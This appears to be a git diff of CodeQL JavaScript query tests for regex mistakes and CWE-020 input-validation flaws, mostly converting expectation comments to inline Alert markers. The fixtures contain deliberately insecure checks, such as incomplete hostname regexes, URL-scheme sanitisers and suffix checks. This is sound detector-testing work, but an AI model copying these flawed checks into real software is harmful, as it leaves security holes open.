a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref index a9ba2975bb7c..181646694e12 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.qlref @@ -1 +1,2 @@ -RegExp/BackrefIntoNegativeLookahead.ql +query: RegExp/BackrefIntoNegativeLookahead.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js index b2199e311374..7cf1ff3629b5 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/tst.js @@ -1,4 +1,3 @@ -// OK + /(.*?)a(?!(a+)b\2)/; -// NOT OK -/(.*?)a(?!(a+)b)\2(.*)/; +/(.*?)a(?!(a+)b)\2(.*)/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref index 1d1f9bbe756e..17bb483eba24 100644 --- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/BackspaceEscape.qlref @@ -1 +1,2 @@ -RegExp/BackspaceEscape.ql \ No newline at end of file +query: RegExp/BackspaceEscape.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js index 7796e660bbaa..1fd49f807e75 100644 --- a/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js +++ b/javascript/ql/test/query-tests/RegExp/BackspaceEscape/tst.js @@ -1,4 +1,4 @@ /\bx\b/; -/[\b]x/; +/[\b]x/; // $ Alert /[\ch]x[\cH]/; /\ch\ch/; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref index 790af75f6e4a..a04b25019d43 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/DuplicateCharacterInCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/DuplicateCharacterInCharacterClass.ql \ No newline at end of file +query: RegExp/DuplicateCharacterInCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js index 59114b90c54a..c87c7140a16c 100644 --- a/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/DuplicateCharacterInCharacterClass/tst.js @@ -1,13 +1,14 @@ -/[foo]/; +/[foo]/; // $ Alert /[a-zc]/; /[\uDC3A\uDC3C]/; -/[??]/; -/[\u003F\u003f]/; -/[\u003F?]/; -/[\x3f\u003f]/; -/[aaa]/; -/[\x0a\x0a]/; -/[\u000a\n]/; +/[??]/; // $ Alert +/[\u003F\u003f]/; // $ Alert +/[\u003F?]/; // $ Alert +/[\x3f\u003f]/; // $ Alert +/[aaa]/; // $ Alert +/[\x0a\x0a]/; // $ Alert +/[\u000a\n]/; // $ Alert /[\u{ff}]/; -/[\u{12340}-\u{12345}]/u; // OK -new RegExp("[\u{12340}-\u{12345}]", "u"); // OK +/[\u{12340}-\u{12345}]/u; +new RegExp("[\u{12340}-\u{12345}]", "u"); +const regex = /\b(?:https?:\/\/|mailto:|www\.)(?:[\S--[\p{P}<>]]|\/|[\S--[\[\]]]+[\S--[\p{P}<>]])+|\b[\S--[@\p{Ps}\p{Pe}<>]]+@([\S--[\p{P}<>]]+(?:\.[\S--[\p{P}<>]]+)+)/gmv; diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref index 55f7a866513d..d6c8edc76cad 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref +++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/EmptyCharacterClass.qlref @@ -1 +1,2 @@ -RegExp/EmptyCharacterClass.ql \ No newline at end of file +query: RegExp/EmptyCharacterClass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js index d234847bbe54..b685d92d94f8 100644 --- a/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js +++ b/javascript/ql/test/query-tests/RegExp/EmptyCharacterClass/tst.js @@ -1,2 +1,2 @@ -/[]/; +/[]/; // $ Alert /[^]/; diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js index 7591d00c4411..18e9a4328d90 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.js @@ -1,5 +1,5 @@ -var escaped = raw.replace(/"/g, '\"'); +var escaped = raw.replace(/"/g, '\"'); // $ Alert (function() { var indirect = /"/g; - raw.replace(indirect, '\"'); + raw.replace(indirect, '\"'); // $ Alert }); diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref index f8b9c39b11ff..97214a93be45 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/IdentityReplacement.qlref @@ -1 +1,2 @@ -RegExp/IdentityReplacement.ql \ No newline at end of file +query: RegExp/IdentityReplacement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js index 33325224dbbe..091c8049f193 100644 --- a/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js +++ b/javascript/ql/test/query-tests/RegExp/IdentityReplacement/tst.js @@ -1,16 +1,16 @@ -raw.replace("\\", "\\"); // NOT OK -raw.replace(/(\\)/, "\\"); // NOT OK -raw.replace(/["]/, "\""); // NOT OK -raw.replace("\\", "\\\\"); // OK +raw.replace("\\", "\\"); // $ Alert +raw.replace(/(\\)/, "\\"); // $ Alert +raw.replace(/["]/, "\""); // $ Alert +raw.replace("\\", "\\\\"); -raw.replace(/foo/g, 'foo'); // NOT OK -raw.replace(/foo/gi, 'foo'); // OK +raw.replace(/foo/g, 'foo'); // $ Alert +raw.replace(/foo/gi, 'foo'); -raw.replace(/^\\/, "\\"); // NOT OK -raw.replace(/\\$/, "\\"); // NOT OK -raw.replace(/\b\\/, "\\"); // NOT OK -raw.replace(/\B\\/, "\\"); // NOT OK -raw.replace(/\\(?!\\)/, "\\"); // NOT OK -raw.replace(/(?/g, "foo"); + return a.replace(/<\!--(?!{cke_protected})[\s\S]+?--\>/g, "foo"); // $ Alert } /\u{ff}/ diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref index acdde814bbcb..a65bb3ab3512 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/RegExpAlwaysMatches.qlref @@ -1 +1,2 @@ -RegExp/RegExpAlwaysMatches.ql \ No newline at end of file +query: RegExp/RegExpAlwaysMatches.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js index b4c54be9b8a6..e46442da3432 100644 --- a/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js +++ b/javascript/ql/test/query-tests/RegExp/RegExpAlwaysMatches/tst.js @@ -1,37 +1,37 @@ function optionalPrefix(x) { - return /^(https:)?/.test(x); // NOT OK + return /^(https:)?/.test(x); // $ Alert } function mandatoryPrefix(x) { - return /^https:/.test(x); // OK + return /^https:/.test(x); } function httpOrHttps(x) { - return /^https?:/.test(x); // OK + return /^https?:/.test(x); } function optionalSuffix(x) { - return /(\.com)?$/.test(x); // NOT OK + return /(\.com)?$/.test(x); // $ Alert } function mandatorySuffix(x) { - return /\.com$/.test(x); // OK + return /\.com$/.test(x); } function protocol(x) { - return /^(?:https?:|ftp:|file:)?/.test(x); // NOT OK + return /^(?:https?:|ftp:|file:)?/.test(x); // $ Alert } function doubleAnchored(x) { - return /^(foo|bar)?$/.test(x); // OK + return /^(foo|bar)?$/.test(x); } function noAnchor(x) { - return /(foo|bar)?/.test(x); // NOT OK + return /(foo|bar)?/.test(x); // $ Alert } function altAnchor(x) { - return /^foo|bar$|(baz)?/.test(x); // NOT OK + return /^foo|bar$|(baz)?/.test(x); // $ Alert } function wildcard(x) { @@ -43,31 +43,31 @@ function wildcard2(x) { } function emptyAlt(x) { - return /^$|foo|bar/.test(x); // OK + return /^$|foo|bar/.test(x); } function emptyAlt2(x) { - return /(^$|foo|bar)/.test(x); // OK + return /(^$|foo|bar)/.test(x); } function emptyAlt3(x) { - return /((^$|foo|bar))/.test(x); // OK + return /((^$|foo|bar))/.test(x); } function search(x) { - return x.search(/[a-z]*/) > -1; // NOT OK + return x.search(/[a-z]*/) > -1; // $ Alert } function search2(x) { - return x.search(/[a-z]/) > -1; // OK + return x.search(/[a-z]/) > -1; } function lookahead(x) { - return x.search(/(?!x)/) > -1; // OK + return x.search(/(?!x)/) > -1; } function searchPrefix(x) { - return x.search(/^(foo)?/) > -1; // NOT OK - `foo?` does not affect the returned index + return x.search(/^(foo)?/) > -1; // $ Alert - `foo?` does not affect the returned index } function searchSuffix(x) { @@ -83,10 +83,10 @@ function nonWordBoundary(x) { } function emptyRegex(x) { - return new RegExp("").test(x); // OK + return new RegExp("").test(x); } function parserTest(x) { - /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); // OK - /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); // ok + /(\w\s*:\s*[^:}]+|#){|@import[^\n]+(?:url|,)/.test(x); + /^((?:a{0,2}|-)|\w\{\d,\d\})+X$/.text(x); } diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref index bbcc8421a409..c653d8604aa9 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.qlref @@ -1 +1,2 @@ -RegExp/UnboundBackref.ql \ No newline at end of file +query: RegExp/UnboundBackref.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js index 9c5481469151..df5b4144172e 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/tst.js @@ -1,16 +1,13 @@ -// OK + /\0/; -// NOT OK -/\1/; -// OK +/\1/; // $ Alert + /^(\s+)\w+\1$/; -// NOT OK -/^(?:\s+)\w+\1$/; -// OK +/^(?:\s+)\w+\1$/; // $ Alert + /[\1]/; -// OK + /^(?\s+)\w+\1$/; /^(?\s+)\w+\k$/; -// NOT OK -/^(?\s+)\w+\2$/; -/^(?\s+)\w+\k$/; +/^(?\s+)\w+\2$/; // $ Alert +/^(?\s+)\w+\k$/; // $ Alert diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref index 13297fa2c9be..ee3a5c95eebf 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableCaret.ql \ No newline at end of file +query: RegExp/UnmatchableCaret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js index 50d70094dd64..b35bd4172385 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/tst.js @@ -1,32 +1,28 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /(a|^b)c/; -// OK + /a*(^b|c)/; -// NOT OK -/a\n^b/; +/a\n^b/; // $ Alert + -// OK /a\n^b/m; -// NOT OK, but not recognised -/a\\n^b/m; +/a\\n^b/m; // $ MISSING: Alert + +/ab*^c/; // $ Alert -// NOT OK -/ab*^c/; -// OK /^^abc/; -// OK + /^(^y|^z)(u$|v$)$/; -// OK + /x*^y/; -// OK + /(?<=(^|\/)(\.|\.\.))$/; diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref index f6798fd1ffa1..c79d650f18e1 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.qlref @@ -1 +1,2 @@ -RegExp/UnmatchableDollar.ql \ No newline at end of file +query: RegExp/UnmatchableDollar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js index 95708b3cd0ed..86da692cea84 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/tst.js @@ -1,38 +1,33 @@ -// NOT OK -/\[^(.css$)]/; +/\[^(.css$)]/; // $ Alert + -// OK /a(b$|c)/; -// OK + /(a|b$)c*/; -// NOT OK -/a$\nb/; +/a$\nb/; // $ Alert + -// OK /a$\nb/m; -// NOT OK, but not recognised -/a$\\nb/m; +/a$\\nb/m; // $ MISSING: Alert + +/a$b*c/; // $ Alert -// NOT OK -/a$b*c/; -// OK /^(^y|^z)(u$|v$)$/; -// OK + /.*x$$$/; -// OK + /x$y*/; -// OK + /x(?!y+$).*y.*/; -// OK + /x(?=[yz]+$).*yz.*/; -// NOT OK -/(?<=$x)yz/; +/(?<=$x)yz/; // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js index 320175ab1d42..ae0447f132fd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteHostnameRegExp/tst-IncompleteHostnameRegExp.js @@ -44,7 +44,7 @@ /^https:\/\/[a-z]*.example.com$/; // $ Alert RegExp('^protos?://(localhost|.+.example.net|.+.example-a.com|.+.example-b.com|.+.example.internal)'); // $ Alert - /^(example.dev|example.com)/; // OK + /^(example.dev|example.com)/; new RegExp('^http://localhost:8000|' + '^https?://.+.example\\.com/'); // $ Alert @@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref index f9eb315d150f..04e603e63d42 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncorrectSuffixCheck.ql +query: Security/CWE-020/IncorrectSuffixCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js index 0b60fec15383..55e9a7d37611 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js @@ -1,3 +1,3 @@ function endsWith(x, y) { - return x.lastIndexOf(y) === x.length - y.length; + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js @@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index = x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { @@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref index 02296c134e1a..bd895fa2e47e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingOriginCheck.ql \ No newline at end of file +query: Security/CWE-020/MissingOriginCheck.ql +postprocess: 